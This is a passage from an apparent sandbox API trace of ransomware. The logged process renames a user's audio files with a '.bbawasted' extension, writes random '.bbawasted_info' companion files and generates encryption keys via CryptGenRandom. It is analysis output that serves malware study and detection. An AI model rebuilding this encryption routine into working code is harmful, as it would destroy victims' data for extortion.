halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\qkedt2uwuzgjryurx.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.137] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.137] SetEndOfFile (hFile=0x120) returned 1 [0074.138] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.138] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.138] lstrcpyW (in: lpString1=0x5bf112, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.138] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\qkedT2UwUZgjryuRX.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\qkedt2uwuzgjryurx.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\qkedT2UwUZgjryuRX.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\qkedt2uwuzgjryurx.wav.bbawasted")) returned 1 [0074.138] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\qkedT2UwUZgjryuRX.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\qkedt2uwuzgjryurx.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.139] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.139] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.140] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.140] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.140] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.141] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.141] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.149] SetEndOfFile (hFile=0x120) returned 1 [0074.151] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.151] CloseHandle (hObject=0x120) returned 1 [0074.153] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.153] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.154] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.154] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.154] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\S3sh3MG.mp3") returned 71 [0074.154] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x298) returned 0x5bf070 [0074.154] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.154] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.154] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.155] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.155] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.155] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\S3sh3MG.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\s3sh3mg.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.155] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.156] SetEndOfFile (hFile=0x120) returned 1 [0074.156] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.156] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.156] lstrcpyW (in: lpString1=0x5bf0fe, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.156] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\S3sh3MG.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\s3sh3mg.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\S3sh3MG.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\s3sh3mg.mp3.bbawasted")) returned 1 [0074.157] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\S3sh3MG.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\s3sh3mg.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.157] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0074.158] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.158] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.158] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.159] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.159] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.159] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.168] SetEndOfFile (hFile=0x120) returned 1 [0074.170] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.170] CloseHandle (hObject=0x120) returned 1 [0074.172] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.172] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.172] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.172] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.173] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\sFjNTBRp.m4a") returned 72 [0074.173] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x29a) returned 0x5bf070 [0074.173] lstrcpyW (in: lpString1=0x5bf100, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.173] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.173] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.173] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.173] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.173] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\sFjNTBRp.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\sfjntbrp.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.174] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.175] SetEndOfFile (hFile=0x120) returned 1 [0074.175] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.175] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.175] lstrcpyW (in: lpString1=0x5bf100, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.175] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\sFjNTBRp.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\sfjntbrp.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\sFjNTBRp.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\sfjntbrp.m4a.bbawasted")) returned 1 [0074.176] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\sFjNTBRp.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\sfjntbrp.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.176] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.178] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.179] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.179] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.179] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.180] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.180] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.188] SetEndOfFile (hFile=0x120) returned 1 [0074.190] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.190] CloseHandle (hObject=0x120) returned 1 [0074.194] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.194] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.194] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.194] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.194] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\T89l38S_rPImA5oyDOD.wav") returned 83 [0074.194] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2b0) returned 0x5bf070 [0074.195] lstrcpyW (in: lpString1=0x5bf116, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.195] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.195] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.195] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.195] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.195] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\T89l38S_rPImA5oyDOD.wav.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\t89l38s_rpima5oydod.wav.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.196] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.197] SetEndOfFile (hFile=0x120) returned 1 [0074.197] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.197] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.197] lstrcpyW (in: lpString1=0x5bf116, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.197] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\T89l38S_rPImA5oyDOD.wav" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\t89l38s_rpima5oydod.wav"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\T89l38S_rPImA5oyDOD.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\t89l38s_rpima5oydod.wav.bbawasted")) returned 1 [0074.198] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\T89l38S_rPImA5oyDOD.wav.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\t89l38s_rpima5oydod.wav.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.198] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x11c [0074.200] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.201] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.201] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.201] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.202] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.202] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.210] SetEndOfFile (hFile=0x120) returned 1 [0074.212] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.212] CloseHandle (hObject=0x120) returned 1 [0074.214] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.214] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.215] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.215] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.215] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\turuzuDgLVYOn.m4a") returned 77 [0074.215] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2a4) returned 0x5bf070 [0074.215] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.215] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.215] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.216] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.216] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.216] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\turuzuDgLVYOn.m4a.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\turuzudglvyon.m4a.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.216] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.217] SetEndOfFile (hFile=0x120) returned 1 [0074.217] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.217] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.217] lstrcpyW (in: lpString1=0x5bf10a, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.217] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\turuzuDgLVYOn.m4a" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\turuzudglvyon.m4a"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\turuzuDgLVYOn.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\turuzudglvyon.m4a.bbawasted")) returned 1 [0074.218] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\turuzuDgLVYOn.m4a.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\turuzudglvyon.m4a.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x11c [0074.218] CreateFileMappingW (hFile=0x11c, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, lpName=0x0) returned 0x110 [0074.220] CryptAcquireContextW (in: phProv=0xf9fdc4, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fdc4*=0x5a4020) returned 1 [0074.221] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x1b8, pbBuffer=0x5bf4e8 | out: pbBuffer=0x5bf4e8) returned 1 [0074.221] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.221] CryptAcquireContextW (in: phProv=0xf9fb2c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fb2c*=0x5a4020) returned 1 [0074.222] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x200, pbBuffer=0xf9fb48 | out: pbBuffer=0xf9fb48) returned 1 [0074.222] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.230] SetEndOfFile (hFile=0x120) returned 1 [0074.232] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.232] CloseHandle (hObject=0x120) returned 1 [0074.233] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf070 | out: hHeap=0x580000) returned 1 [0074.233] CryptAcquireContextW (in: phProv=0xf9fe0c, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fe0c*=0x5a4020) returned 1 [0074.234] CryptGenRandom (in: hProv=0x5a4020, dwLen=0x48, pbBuffer=0xf9fe48 | out: pbBuffer=0xf9fe48) returned 1 [0074.234] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.234] lstrlenW (lpString="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\WKgTuyD6QneWI9WUK.mp3") returned 81 [0074.234] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0x2ac) returned 0x5bf070 [0074.234] lstrcpyW (in: lpString1=0x5bf112, lpString2=".bbawasted_info" | out: lpString1=".bbawasted_info") returned=".bbawasted_info" [0074.234] RtlAllocateHeap (HeapHandle=0x580000, Flags=0x0, Size=0xa3a) returned 0x5bf8f0 [0074.234] CryptAcquireContextW (in: phProv=0xf9fde8, szContainer=0x0, szProvider=0x0, dwProvType=0x1, dwFlags=0xf0000040 | out: phProv=0xf9fde8*=0x5a4020) returned 1 [0074.235] CryptGenRandom (in: hProv=0x5a4020, dwLen=0xa3a, pbBuffer=0x5bf8f0 | out: pbBuffer=0x5bf8f0) returned 1 [0074.235] CryptReleaseContext (hProv=0x5a4020, dwFlags=0x0) returned 1 [0074.235] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\WKgTuyD6QneWI9WUK.mp3.bbawasted_info" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\wkgtuyd6qnewi9wuk.mp3.bbawasted_info"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x1, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x120 [0074.235] WriteFile (in: hFile=0x120, lpBuffer=0x5bf8f0*, nNumberOfBytesToWrite=0xa3a, lpNumberOfBytesWritten=0xf9fe04, lpOverlapped=0x0 | out: lpBuffer=0x5bf8f0*, lpNumberOfBytesWritten=0xf9fe04*=0xa3a, lpOverlapped=0x0) returned 1 [0074.236] SetEndOfFile (hFile=0x120) returned 1 [0074.237] SetFilePointer (in: hFile=0x120, lDistanceToMove=0, lpDistanceToMoveHigh=0x0, dwMoveMethod=0x0 | out: lpDistanceToMoveHigh=0x0) returned 0x0 [0074.237] HeapFree (in: hHeap=0x580000, dwFlags=0x0, lpMem=0x5bf8f0 | out: hHeap=0x580000) returned 1 [0074.237] lstrcpyW (in: lpString1=0x5bf112, lpString2=".bbawasted" | out: lpString1=".bbawasted") returned=".bbawasted" [0074.237] MoveFileW (lpExistingFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\WKgTuyD6QneWI9WUK.mp3" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\wkgtuyd6qnewi9wuk.mp3"), lpNewFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\WKgTuyD6QneWI9WUK.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\wkgtuyd6qnewi9wuk.mp3.bbawasted")) returned 1 [0074.237] CreateFileW (lpFileName="\\\\?\\C:\\Users\\5p5NrGJn0jS HALPmcxz\\Music\\rU_rkSHxAiyn_4VsYXE\\WKgTuyD6QneWI9WUK.mp3.bbawasted" (normalized: "c:\\users\\5p5nrgjn0js halpmcxz\\music\\ru_rkshxaiyn_4vsyxe\\wkgtuyd6qnewi9wuk.mp3.bbawasted"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x110 [0074.237] CreateFileMappingW (hFile=0x110, lpFileMappingAttributes=0x0, flProtect=0x4, dwMaximumSizeHigh=0x0, dwMaximumSizeLow=0x0, 